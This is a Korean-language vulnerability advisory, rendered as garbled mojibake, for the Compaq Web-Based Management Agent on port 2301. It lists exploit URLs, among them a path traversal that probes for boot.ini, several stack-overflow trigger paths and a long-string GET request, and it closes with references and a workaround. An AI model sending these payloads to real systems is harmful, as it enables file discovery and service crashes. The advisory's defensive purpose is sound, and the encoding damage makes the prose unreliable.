English
¢¸¢· µÚ·Î
Ãë¾àÁ¡ID 29074
À§Çèµµ 30
Æ÷Æ® 2301
ÇÁ·ÎÅäÄÝ TCP
ºÐ·ù WWW
»ó¼¼¼³¸í ÇØ´ç Compaq Web-Based Management Agent´Â ´ÙÁßÀÇ Ãë¾àÁ¡µéÀ» °¡Áö°í ÀÖ´Ù.
Compaq Web-Based Management Agent´Â ¸ðµç °ü¸®¹Þ´Â ÇÏÀ§ ½Ã½ºÅ۵鿡 ´ëÇÑ ÀåÄ¡ Á¤º¸¿Í SNMP Æ®·¦(traq)µéÀ» À§ÇÑ ¾ó·¯Æ®(alert)µéÀ» Á¦°øÇØ ÁØ´Ù. ´Ù¼öÀÇ Ãë¾àÁ¡µéÀÌ ÀÌ Agent¿¡ Á¸ÀçÇÏ¿© ÀÌ Ãë¾àÁ¡µéÀ» µµ¿ëÇÔÀ¸·Î½á ¿ø°ÝÁöÀÇ °ø°ÝÀڴ ƯÁ¤ ÆÄÀÏÀÌ ½Ã½ºÅÛ¿¡ Á¸ÀçÇÏ´ÂÁö ÇÏÁö ¾Ê´ÂÁö¸¦ ¾Ë ¼ö ÀÖ´Ù. ¶ÇÇÑ ¿ø°ÝÁöÀÇ °ø°ÝÀÚ´Â ÀÌ ¼­ºñ½º°¡ Å©·¡½¬¸¦ ÀÏÀ¸Å°°Ô ÇÒ ¼öµµ ÀÖ´Ù.

¿ø°ÝÁöÀÇ °ø°ÝÀڴ ƯÁ¤ ÆÄÀÏÀÌ ¼­¹ö¿¡ Á¸ÀçÇÏ´ÂÁö ±×·¸Áö ¾ÊÀºÁö¸¦ ¾Ë¾Æ³»±â À§ÇØ ´ÙÀ½ ÇüÅÂÀÇ URLÀ» ¿äûÇÒ ¼ö ÀÖ´Ù:
http://[target]:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini

¶ÇÇÑ ´Ù¼öÀÇ URLµéÀÌ ½ºÅà ±â¹ÝÀÇ ¿À¹öÇ÷ο츦 À¯¹ßÇÒ ¼ö ÀÖ´Ù. ±×·¯³ª ÀÌ ¿À¹öÇ÷οìµéÀÌ ÀÓÀÇÀÇ Äڵ带 ½ÇÇà½Ãų ¼ö ÀÖµµ·Ï ÇØ ÁÖ´ÂÁö¸¦ °¡¸£Å°´Â °ÍÀº ¾Æ´Ï´Ù. URLµéÀº ´ÙÀ½°ú °°´Ù:
http://[target]:2301/<!.StringRedirecturl>
http://[target]:2301/<!>
http://[target]:2301/survey/<!>
http://[target]:2301/<!.StringHttpRequest=Url>
http://[target]:2301/survey/<!.StringHttpRequest=Url>
http://[target]:2301/<!.St ringIsapiECB=lpszPathInfo>
http://[target]:2301/<!.ObjectIsapiECB>

¶ÇÇÑ ¹öÆÛ ¿À¹öÇ÷οì´Â ´ÙÀ½ HTTP ¿äûÀ¸·Î À¯¹ßµÉ ¼ö ÀÖ´Ù:
GET /<!.FunctionContentType=(¾à 250 AAAAAµé)> HTTP/1.0

¿ø°ÝÁöÀÇ °ø°ÝÀÚ´Â ¶ÇÇÑ ´ÙÀ½ URLÀ» ¿äûÇÔÀ¸·Î½á 'TAG" ¸®½ºÆ®¸¦ º¼ ¼öµµ ÀÖ´Ù:
http://[target]:2301/<!.TableDisplayTags>

À§¿¡ ¸®½ºÆ®µÈ URLµéÀº ¶ÇÇÑ HTTPS Æ÷Æ® (tcp 2381)À» ÅëÇØ¼­µµ »ç¿ëµÉ ¼ö ÀÖ´Ù.

* Âü°í »çÀÌÆ®:
http://www.securiteam.com/securitynews/5CP0S15AAC.html
http://www.securitytracker.com/alerts/2003/Apr/1006453.html

* ¿µÇâÀ» ¹Þ´Â Ç÷§Æû:
Compaq Insight Manager Any version
Microsoft Windows Any version
ÇØ°áÃ¥ 2014³â 6¿ù ÇöÀç·Î½á´Â ÆÐÄ¡³ª ¾÷±×·¹À̵尡 ³ª¿ÍÀÖÁö ¾Ê´Ù.

Àӽà Á¶Ä¡¹æ¹ýÀ¸·Î½á Web-Enabled Agent¸¦ ÀÛµ¿ÁßÁö ½ÃÄÑ¾ß ÇÑ´Ù. Web-Enabled Agent¸¦ ÀÛµ¿ÁßÁö ½Ã´Â ¹æ¹ý¿¡ ´ëÇØ¼­´Â ´ÙÀ½ »çÀÌÆ®¿¡¼­ "Disabling the Web-Enabled Agents"¿¡ ÀÖ´Â ¹®¼­¸¦ Âü°íÇÏ¾ß ÇÑ´Ù:
http://h18000.www1.hp.com/products/servers/management/agentsecurity.html
°ü·Ã URL (CVE)
°ü·Ã URL 8009,8014,8015,8019 (SecurityFocus)
°ü·Ã URL 12426,11736,11737,11738,12660 (ISS)